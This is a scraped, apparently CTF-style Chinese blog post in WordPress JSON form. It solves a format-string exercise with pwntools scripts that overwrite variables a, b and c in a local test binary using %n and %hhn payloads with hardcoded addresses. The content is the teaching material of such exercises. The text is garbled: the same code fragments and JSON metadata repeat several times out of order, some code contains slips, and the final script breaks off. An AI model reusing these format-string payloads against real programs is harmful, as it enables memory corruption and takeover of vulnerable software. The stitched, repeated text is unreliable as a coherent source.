\u63a5\u6536\u8f93\u51fa\u5e76\u9a8c\u8bc1\n output = p.recvall(timeout=2)\n print(output)\n\nexploit_c()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u4e0b\u9762\u6211\u4eec\u8fd0\u884c\u7a0b\u5e8f\u5c31\u80fd\u770b\u5230a\u5728\u6267\u884c\u65f6\u7684\u5730\u5740<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u7136\u540e\u6211\u4eec\u53ef\u4ee5\u5199\u51faa\u7684\u5229\u7528\u4ee3\u7801<\/p>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_a():\n p = process('.\/test2')\n\n # \u786c\u7f16\u7801a\u7684\u5730\u5740\uff08\u901a\u8fc7gdb\u8ba1\u7b97\u5f97\u5230\uff09\n a_addr = 0xffffd078 # \u66ff\u6362\u4e3a\u4f60\u7684\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u8986\u76d6a\u4e3a0x10\n payload = p32(a_addr) + b\"%12c%7$n\" # \u504f\u79fb\u91cf\u9700\u6839\u636e\u5b9e\u9645\u6808\u5e03\u5c40\u8c03\u6574\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\n print(p.clean())\n p.close()\n\nexploit_a()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u8f93\u51fa\u4e86\u6211\u4eec\u60f3\u8981\u7684\u5185\u5bb9<\/p>\n\n\n\n\u8fdb\u5165b == 2<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\nb\u53d8\u91cf\u5730\u5740\u6700\u5c0f\u4e5f\u662f\u5360\u7528\u4e864\u5b57\u8282\u7684\uff0c\u6211\u4eec\u65e0\u8bba\u5982\u4f55\u90fd\u4e0d\u80fd\u8986\u76d6\u62102\uff0c\u6240\u4ee5\u601d\u8def\u5c31\u662f\u628a\u5730\u5740\u5199\u5230\u540e\u9762\u53bb<\/p>\n\n\n\n#\u5bfc\u5165pwn\u6a21\u5757\nfrom pwn import *\n#\u8bbe\u7f6e\u8fd0\u884c\u73af\u5883\ncontext(arch='i386',os='linux')\ncontext.terminal = ['tmux','splitw','-h']\n\np = process(\".\/test2\")\n\ndef exploit_c():\n b_address = 0x804c02c\n #\u6784\u9020Payload\n padding = b'11'\n padding_address = b'\\x00\\x00'\n\n Payload = padding + b'%9$n' + padding_address + p32(b_address)\n log,info(\"Payload: %s\" % Payload)\n #\u53d1\u9001Payload\n p.sendline(Payload)\n\n\nexploit_c()\nprint(p.recv())<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u51fa\u73b0\u4e86\u6211\u4eec\u9884\u671f\u7684\u8f93\u51fa<\/p>\n\n\n\n\u8fdb\u5165c == 0x12345678<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\n\u6784\u9020payload\u7684\u601d\u8def\u5982\u4e0b<\/p>\n\n\n\n\u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n\u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12<\/code><\/pre>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_c():\n p = process('.\/test2')\n\n c_addr = 0x804c030 # \u66ff\u6362\u4e3a\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n # \u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12\n payload = p32(c_addr) + p32(c_addr+1) + p32(c_addr+2) + p32(c_addr+3)\n \n # \u8ba1\u7b97\u5404\u5b57\u8282\u7684\u5b57\u7b26\u6570\uff08\u6ce8\u610f\u987a\u5e8f\u4e3a\u5c0f\u7aef\u5e8f\uff09\uff1a\n # 0x78 - 16\uff08\u5df2\u5199\u516516\u5b57\u8282\uff09 = 0x78 - 0x10 = 104 \u2192 \"%104c\"\n # 0x56 - 0x78 = 0xDE (222) \u2192 \u9700\u8865\u52300x156 \u2192 222 \u2192 \"%222c\"\n # 0x34 - 0x56 = 0xDE (222) \u2192 \"%222c\"\n # 0x12 - 0x34 = 0xDE (222) \u2192 \"%222c\"\n payload += b\"%104c%7$hhn\" # \u8986\u76d6c_addr\uff08\u7b2c6\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%8$hhn\" # \u8986\u76d6c_addr+1\uff08\u7b2c7\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%9$hhn\" # \u8986\u76d6c_addr+2\uff08\u7b2c8\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%10$hhn\" # \u8986\u76d6c_addr+3\uff08\u7b2c9\u4e2a\u53c2\u6570\uff09\n \n # \u68c0\u67e5payload\u957f\u5ea6\uff08\u5fc5\u987b \u2264100\uff09\n assert len(payload) <= 100, f\"Payload\u8fc7\u957f: {len(payload)}\u5b57\u8282\"\n\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\u5e76\u9a8c\u8bc1\n output = p.recvall(timeout=2)\n print(output)\n\nexploit_c()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u7136\u540e\u6211\u4eec\u53ef\u4ee5\u5199\u51faa\u7684\u5229\u7528\u4ee3\u7801<\/p>\n\n\n\n
from pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_a():\n p = process('.\/test2')\n\n # \u786c\u7f16\u7801a\u7684\u5730\u5740\uff08\u901a\u8fc7gdb\u8ba1\u7b97\u5f97\u5230\uff09\n a_addr = 0xffffd078 # \u66ff\u6362\u4e3a\u4f60\u7684\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u8986\u76d6a\u4e3a0x10\n payload = p32(a_addr) + b\"%12c%7$n\" # \u504f\u79fb\u91cf\u9700\u6839\u636e\u5b9e\u9645\u6808\u5e03\u5c40\u8c03\u6574\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\n print(p.clean())\n p.close()\n\nexploit_a()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u8f93\u51fa\u4e86\u6211\u4eec\u60f3\u8981\u7684\u5185\u5bb9<\/p>\n\n\n\n\u8fdb\u5165b == 2<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\nb\u53d8\u91cf\u5730\u5740\u6700\u5c0f\u4e5f\u662f\u5360\u7528\u4e864\u5b57\u8282\u7684\uff0c\u6211\u4eec\u65e0\u8bba\u5982\u4f55\u90fd\u4e0d\u80fd\u8986\u76d6\u62102\uff0c\u6240\u4ee5\u601d\u8def\u5c31\u662f\u628a\u5730\u5740\u5199\u5230\u540e\u9762\u53bb<\/p>\n\n\n\n#\u5bfc\u5165pwn\u6a21\u5757\nfrom pwn import *\n#\u8bbe\u7f6e\u8fd0\u884c\u73af\u5883\ncontext(arch='i386',os='linux')\ncontext.terminal = ['tmux','splitw','-h']\n\np = process(\".\/test2\")\n\ndef exploit_c():\n b_address = 0x804c02c\n #\u6784\u9020Payload\n padding = b'11'\n padding_address = b'\\x00\\x00'\n\n Payload = padding + b'%9$n' + padding_address + p32(b_address)\n log,info(\"Payload: %s\" % Payload)\n #\u53d1\u9001Payload\n p.sendline(Payload)\n\n\nexploit_c()\nprint(p.recv())<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u51fa\u73b0\u4e86\u6211\u4eec\u9884\u671f\u7684\u8f93\u51fa<\/p>\n\n\n\n\u8fdb\u5165c == 0x12345678<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\n\u6784\u9020payload\u7684\u601d\u8def\u5982\u4e0b<\/p>\n\n\n\n\u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n\u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12<\/code><\/pre>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_c():\n p = process('.\/test2')\n\n c_addr = 0x804c030 # \u66ff\u6362\u4e3a\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n # \u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12\n payload = p32(c_addr) + p32(c_addr+1) + p32(c_addr+2) + p32(c_addr+3)\n \n # \u8ba1\u7b97\u5404\u5b57\u8282\u7684\u5b57\u7b26\u6570\uff08\u6ce8\u610f\u987a\u5e8f\u4e3a\u5c0f\u7aef\u5e8f\uff09\uff1a\n # 0x78 - 16\uff08\u5df2\u5199\u516516\u5b57\u8282\uff09 = 0x78 - 0x10 = 104 \u2192 \"%104c\"\n # 0x56 - 0x78 = 0xDE (222) \u2192 \u9700\u8865\u52300x156 \u2192 222 \u2192 \"%222c\"\n # 0x34 - 0x56 = 0xDE (222) \u2192 \"%222c\"\n # 0x12 - 0x34 = 0xDE (222) \u2192 \"%222c\"\n payload += b\"%104c%7$hhn\" # \u8986\u76d6c_addr\uff08\u7b2c6\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%8$hhn\" # \u8986\u76d6c_addr+1\uff08\u7b2c7\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%9$hhn\" # \u8986\u76d6c_addr+2\uff08\u7b2c8\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%10$hhn\" # \u8986\u76d6c_addr+3\uff08\u7b2c9\u4e2a\u53c2\u6570\uff09\n \n # \u68c0\u67e5payload\u957f\u5ea6\uff08\u5fc5\u987b \u2264100\uff09\n assert len(payload) <= 100, f\"Payload\u8fc7\u957f: {len(payload)}\u5b57\u8282\"\n\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\u5e76\u9a8c\u8bc1\n output = p.recvall(timeout=2)\n print(output)\n\nexploit_c()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u8f93\u51fa\u4e86\u6211\u4eec\u60f3\u8981\u7684\u5185\u5bb9<\/p>\n\n\n\n\u8fdb\u5165b == 2<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\nb\u53d8\u91cf\u5730\u5740\u6700\u5c0f\u4e5f\u662f\u5360\u7528\u4e864\u5b57\u8282\u7684\uff0c\u6211\u4eec\u65e0\u8bba\u5982\u4f55\u90fd\u4e0d\u80fd\u8986\u76d6\u62102\uff0c\u6240\u4ee5\u601d\u8def\u5c31\u662f\u628a\u5730\u5740\u5199\u5230\u540e\u9762\u53bb<\/p>\n\n\n\n#\u5bfc\u5165pwn\u6a21\u5757\nfrom pwn import *\n#\u8bbe\u7f6e\u8fd0\u884c\u73af\u5883\ncontext(arch='i386',os='linux')\ncontext.terminal = ['tmux','splitw','-h']\n\np = process(\".\/test2\")\n\ndef exploit_c():\n b_address = 0x804c02c\n #\u6784\u9020Payload\n padding = b'11'\n padding_address = b'\\x00\\x00'\n\n Payload = padding + b'%9$n' + padding_address + p32(b_address)\n log,info(\"Payload: %s\" % Payload)\n #\u53d1\u9001Payload\n p.sendline(Payload)\n\n\nexploit_c()\nprint(p.recv())<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u51fa\u73b0\u4e86\u6211\u4eec\u9884\u671f\u7684\u8f93\u51fa<\/p>\n\n\n\n\u8fdb\u5165c == 0x12345678<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\n\u6784\u9020payload\u7684\u601d\u8def\u5982\u4e0b<\/p>\n\n\n\n\u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n\u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12<\/code><\/pre>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_c():\n p = process('.\/test2')\n\n c_addr = 0x804c030 # \u66ff\u6362\u4e3a\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n # \u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12\n payload = p32(c_addr) + p32(c_addr+1) + p32(c_addr+2) + p32(c_addr+3)\n \n # \u8ba1\u7b97\u5404\u5b57\u8282\u7684\u5b57\u7b26\u6570\uff08\u6ce8\u610f\u987a\u5e8f\u4e3a\u5c0f\u7aef\u5e8f\uff09\uff1a\n # 0x78 - 16\uff08\u5df2\u5199\u516516\u5b57\u8282\uff09 = 0x78 - 0x10 = 104 \u2192 \"%104c\"\n # 0x56 - 0x78 = 0xDE (222) \u2192 \u9700\u8865\u52300x156 \u2192 222 \u2192 \"%222c\"\n # 0x34 - 0x56 = 0xDE (222) \u2192 \"%222c\"\n # 0x12 - 0x34 = 0xDE (222) \u2192 \"%222c\"\n payload += b\"%104c%7$hhn\" # \u8986\u76d6c_addr\uff08\u7b2c6\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%8$hhn\" # \u8986\u76d6c_addr+1\uff08\u7b2c7\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%9$hhn\" # \u8986\u76d6c_addr+2\uff08\u7b2c8\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%10$hhn\" # \u8986\u76d6c_addr+3\uff08\u7b2c9\u4e2a\u53c2\u6570\uff09\n \n # \u68c0\u67e5payload\u957f\u5ea6\uff08\u5fc5\u987b \u2264100\uff09\n assert len(payload) <= 100, f\"Payload\u8fc7\u957f: {len(payload)}\u5b57\u8282\"\n\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\u5e76\u9a8c\u8bc1\n output = p.recvall(timeout=2)\n print(output)\n\nexploit_c()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u53ef\u4ee5\u770b\u5230\u8f93\u51fa\u4e86\u6211\u4eec\u60f3\u8981\u7684\u5185\u5bb9<\/p>\n\n\n\n
b\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\n
objdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\nb\u53d8\u91cf\u5730\u5740\u6700\u5c0f\u4e5f\u662f\u5360\u7528\u4e864\u5b57\u8282\u7684\uff0c\u6211\u4eec\u65e0\u8bba\u5982\u4f55\u90fd\u4e0d\u80fd\u8986\u76d6\u62102\uff0c\u6240\u4ee5\u601d\u8def\u5c31\u662f\u628a\u5730\u5740\u5199\u5230\u540e\u9762\u53bb<\/p>\n\n\n\n#\u5bfc\u5165pwn\u6a21\u5757\nfrom pwn import *\n#\u8bbe\u7f6e\u8fd0\u884c\u73af\u5883\ncontext(arch='i386',os='linux')\ncontext.terminal = ['tmux','splitw','-h']\n\np = process(\".\/test2\")\n\ndef exploit_c():\n b_address = 0x804c02c\n #\u6784\u9020Payload\n padding = b'11'\n padding_address = b'\\x00\\x00'\n\n Payload = padding + b'%9$n' + padding_address + p32(b_address)\n log,info(\"Payload: %s\" % Payload)\n #\u53d1\u9001Payload\n 